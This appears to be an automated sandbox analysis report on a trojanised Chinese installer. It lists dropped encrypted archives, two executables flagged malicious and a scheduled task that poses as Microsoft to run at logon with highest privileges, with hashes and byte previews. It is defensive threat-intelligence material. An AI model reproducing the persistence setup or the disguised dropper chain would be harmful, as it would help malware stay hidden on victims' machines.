SHA-512: 9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
Malicious: false
                            Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                            Process:C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):74960
                            Entropy (8bit):7.997593701656546
                            Encrypted:true
                            SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                            MD5:059BA7C31F3E227356CA5F29E4AA2508
                            SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                            SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                            SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                            Malicious:false
                            Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):29730
                            Entropy (8bit):7.994290657653607
                            Encrypted:true
                            SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                            MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                            SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                            SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                            SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                            Malicious:false
                            Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                            Process:C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):29730
                            Entropy (8bit):7.994290657653608
                            Encrypted:true
                            SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                            MD5:A9C8A3E00692F79E1BA9693003F85D18
                            SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                            SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                            SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                            Malicious:false
                            Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                            Process:C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):2631665
                            Entropy (8bit):7.999930027122199
                            Encrypted:true
                            SSDEEP:49152:a9KRaF4B6lZYPv5jRwQNLpPKYlB8a+/OO1i/ncoQhnXTNZvCOy0k:EKR6C6jCv5jJppBppOacoQFX5Vyh
                            MD5:5959826018FEF5FC2FC4045B36EE00CE
                            SHA1:94BF8814C8333EE72DC5E9B1883AB7302109F38C
                            SHA-256:93FFE7A9D2F233B1820BBED0ED87DB977A0AC5D068544B68A38895559B4B1B80
                            SHA-512:0CD5594B32F0B34D55A171B38CE15855E1E145AC12E04D15A9902028F6D7A7A61209DD6523A429274B0B78DEB0600F1738A5B63BCFD2482423832A6A3D18C719
                            Malicious:false
                            Preview:7z..'....;z..'(.....A.......6o^.>"|L.......=O|%d.S...55.^..{m...........[....j.s.i..S.....l.D."../f].dN.L........k.O.O..x'...,...<.As...=0....E...p. \..k.F......krK.).l...V.2.@1.h...p.PG.6.SK.m..j....#.d...k.tTs..Q...k.o.....Y1.??Q.@T..=:...tP$.j...o....N-jTojGu.....z..p..........K+iV....4..D..#..L...R.=5.oBV#.....d.`9..8>..+.2H.....+.........-..*O^.aW/.X.G.U.8.Y.L\.q.K.s.RZ..>...2.....+.Aa..1..1...`q.dti..G...y...>..O..B...F....Ih..'.e.1.....0.\..K...B.SD.v...B.v=..V.[.:.lY.`..y.E....Su....8..*..{...&d.n.....c9.cd.Zx..L,.".Gi.....9s.|Br.......{..Hj.6.O:..e:..h...wQ..<.6.G......T.)f0.....bX..5......D.@4..?.@.........1Zn....b....oc.>.5...I..SA..n.x.A...p....E.`.-Q..l(.4...._.......^..E.R e\.u..O-@\..o.h.`.$.]..(.~w.d.X[...d&...'mw..Z....BY.L......ND.h."7.`>......j.37.~..<Mn,..;.1..h.g..>..H1U.......*2..5..(\j...."...t.8.soy.<..[.......g...^~!5f..*0.?..)......P..mkQ.y..LXn...r....>..6v3ND.X........q..|=...y..i.Z..n....J.....i.'....e...LZ
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):63640
                            Entropy (8bit):6.482810107683822
                            Encrypted:false
                            SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                            MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                            SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                            SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                            SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 9%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):4096
                            Entropy (8bit):3.3449406240731085
                            Encrypted:false
                            SSDEEP:48:dXKLzDlnDPLL6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnDP6whldOVQOj6dKbKsz7
                            MD5:1EA10B1FA76DC2F1967E53A3FC2D43C4
                            SHA1:23EADA9D0994D5B9ADE7878493C44551C0B5CF44
                            SHA-256:2748447EBDE83E35B8984D2993A8331DAC7B7924638502024D8531A07E74C63C
                            SHA-512:15BF2663CEF3905AE3B13D0A4ABC2E3BBF1FF213BCA5C568641978D5548A7DBED2EC7FC5A00B330287E90DF675EFB804613D4801F6995C7748840CC0BCBA637F
                            Malicious:false
                            Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAv
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):2381502
                            Entropy (8bit):7.999925361527667
                            Encrypted:true
                            SSDEEP:49152:jy256EiA8xG5zSjVi8PdH5lP0fc2k5UASQ/oFY/vyJHDNruHBsOvW:jyIrB8xG58fH5lP0l6XUNrWC
                            MD5:688183445140DA0F13690A143C57A42F
                            SHA1:01DF7279FA87C87733E93BF7B3DA05CF2ECF6490
                            SHA-256:8F0464EC2A7320ED2B11972E642AA490423857277E2BEB87B8C4DBDDA467894A
                            SHA-512:2C01BC07A0FED5FA6516DFDE36B2574620D1DC03D20B5814B467E38519EAC0EE82D403A94BD6D2966ED8713E9ABE26A1A00925805B1793ECD23621BA85045FD7
                            Malicious:false
                            Preview:..8-....,....A...TU.>.t.....~.N.Y4,..cZX"O]Z..n.G.;..3.,.WIz..<H....,.H,.w./.%"&z...z...;.&...<Jp..............z@....)...+..........-.|..c.._?S.mYY..j.|O..u..).........oR.%...3ZZX.%....}....2o.U..-.(D(w..f..f........AA....og....y...I..=..8.7..ld&dG.xC_.......f...$.....I..^..t..#=.k.L.....8...q&.....!X......a.XA.q.b|m.5.Gh0...J..R....../&*d....-.o..v.Z...;t!..Tb%.?.u.t.-.G....j.m.].m...=u.....o ..B.....e.^VO]j...%..[..`._...M.<.lq..%.-...BQ.C..oK:r4...dO...N...{O..E87M.a..Hwoxaw.J.T).s.C......w..P...9.qj.=cr..{.R...:Uf#,....M..h?.[.k...........K./.!....E(..G_.$.....1.1.T.......7......a........E.b...q...F.0...i.w.../..%/.&.9.?;...6X.!>...{.}]...K..]..2w..G;....XP!..ddwH....|......8.......O..J.-N....=.......g1p........z.w.3.P...........f......(uY..]......34._.5.'3.g.6p.E.4..`Z..EZ...p..b.&.........g...K.#Vd....\..,...D."+.M..#.#...&.|.[...7...#...$..o.*.U.@uF.u.c...u....'..52..u.Ni.>.jl.W..e.......^......` ..<..'.cRf.z$..H../&.Qb3z.1.
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):1.1940658735648508
                            Encrypted:false
                            SSDEEP:3:Nlllul/nq/llh:NllUyt
                            MD5:AB80AD9A08E5B16132325DF5584B2CBE
                            SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                            SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                            SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                            Malicious:false
                            Preview:@...e................................................@..........
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):6144
                            Entropy (8bit):4.720366600008286
                            Encrypted:false
                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3606016
                            Entropy (8bit):7.0063494494702985
                            Encrypted:false
                            SSDEEP:49152:/MifTj964EMRY42Kgq7eJEJqx2dhZe71MzuiehWIKxZfAtbyBSfbZmSKiyQF:/M+jcZ42KXw2dhZe71MzSRFyBSDH
                            MD5:95ACD5631A9131DB1FD066565AFC9A67
                            SHA1:8E9473BD632FF0F57FC34EECAC17174341D80D94
                            SHA-256:EA6B71519CD54AB523B822F84D5D4E5B305214DA4C37E96A02D8BC1CB182F58B
                            SHA-512:70188E7AD6B0D9DA5E88EEFC6095F99066F73FDAB10F084E3F2F96B30D8A717BAE75E9C1B476FB996BC86B9A753AAF26F96024D0068090B437EACE6E5BE35681
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 24%
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Fig...........!.....h....................................................7...........@.........................XC.......J..<....07.X....................@7..?...................................................K...............................text....f.......h.................. ..`.rdata..T............l..............@..@.data................b..............@....00cfg.......`(......"(.............@..@.tls.........p(......$(.............@....voltbl.F.....(......&(..................#.q....P.....(......((............. ..`.rsrc...X....07.......6.............@..@.reloc...?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3366912
                            Entropy (8bit):6.530562565512027
                            Encrypted:false
                            SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                            MD5:E4680C0AB69900E6A19A0AA38BD54AAD
                            SHA1:F4350D5430FDB90C16C55B71DCBC4B42297EC475
                            SHA-256:D2E14BDEE1B2F82C3AE57D9619D1D7B71DD9AAFAA86128AC64F695867704A0E0
                            SHA-512:9AB2A1A31084355B4C19FB6E9233A6674E442754FBDCCF2E93C5F6EAB6936CA7F0ADEEC15DE164FBB8F019994DB0A1F34859BAAB941DFA1804306C3EFBA949C9
                            Malicious:true
                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                            Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3366912
                            Entropy (8bit):6.530562565512027
                            Encrypted:false
                            SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                            MD5:E4680C0AB69900E6A19A0AA38BD54AAD
                            SHA1:F4350D5430FDB90C16C55B71DCBC4B42297EC475
                            SHA-256:D2E14BDEE1B2F82C3AE57D9619D1D7B71DD9AAFAA86128AC64F695867704A0E0
                            SHA-512:9AB2A1A31084355B4C19FB6E9233A6674E442754FBDCCF2E93C5F6EAB6936CA7F0ADEEC15DE164FBB8F019994DB0A1F34859BAAB941DFA1804306C3EFBA949C9
                            Malicious:true
                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                            Process:C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):6144
                            Entropy (8bit):4.720366600008286
                            Encrypted:false
                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3606016
                            Entropy (8bit):7.0063494494702985
                            Encrypted:false
                            SSDEEP:49152:/MifTj964EMRY42Kgq7eJEJqx2dhZe71MzuiehWIKxZfAtbyBSfbZmSKiyQF:/M+jcZ42KXw2dhZe71MzSRFyBSDH
                            MD5:95ACD5631A9131DB1FD066565AFC9A67
                            SHA1:8E9473BD632FF0F57FC34EECAC17174341D80D94
                            SHA-256:EA6B71519CD54AB523B822F84D5D4E5B305214DA4C37E96A02D8BC1CB182F58B
                            SHA-512:70188E7AD6B0D9DA5E88EEFC6095F99066F73FDAB10F084E3F2F96B30D8A717BAE75E9C1B476FB996BC86B9A753AAF26F96024D0068090B437EACE6E5BE35681
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 24%
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Fig...........!.....h....................................................7...........@.........................XC.......J..<....07.X....................@7..?...................................................K...............................text....f.......h.................. ..`.rdata..T............l..............@..@.data................b..............@....00cfg.......`(......"(.............@..@.tls.........p(......$(.............@....voltbl.F.....(......&(..................#.q....P.....(......((............. ..`.rsrc...X....07.......6.............@..@.reloc...?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:ASCII text, with CRLF, CR line terminators
                            Category:dropped
                            Size (bytes):406
                            Entropy (8bit):5.117520345541057
                            Encrypted:false
                            SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                            MD5:9200058492BCA8F9D88B4877F842C148
                            SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                            SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                            SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                            Malicious:false
                            Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.959675428593499
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 98.04%
                            • Inno Setup installer (109748/4) 1.08%
                            • InstallShield setup (43055/19) 0.42%
                            • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                            File name:#U5b89#U88c5#U52a9#U624b2.0.7.exe
                            File size:8'648'945 bytes
                            MD5:d4c8420bea7c19a44ab6ad71fd8dde34
                            SHA1:32357f3fbd634ec73d11a2322e317b6c2d50e1b4
                            SHA256:25147cff7a4bd1554ca3d0fa3549982132be1c59f75881786e5457ff3128ff6a
                            SHA512:ce69f77af9cddde5dacfeeed2b8ee3d9cc99180e7dd7b3d51dcf9ecbfd2135692e84fedd216b2de0549b64246b972122da6309b77f6c9bf5c218caab95e6a7ba
                            SSDEEP:196608:l3USsuLZLqp/zr+RVj6f4AL05yAMdZd8pr90Rerw:l3nLK7KRl6fdLVVZdc9y
                            TLSH:1E962322F2CBE03EF05D1B370573A14854FB6A616922AE179AECB4ECCE355501E3E647
                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                            Icon Hash:0c0c2d33ceec80aa
                            Entrypoint:0x4a83bc
                            Entrypoint Section:.itext
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
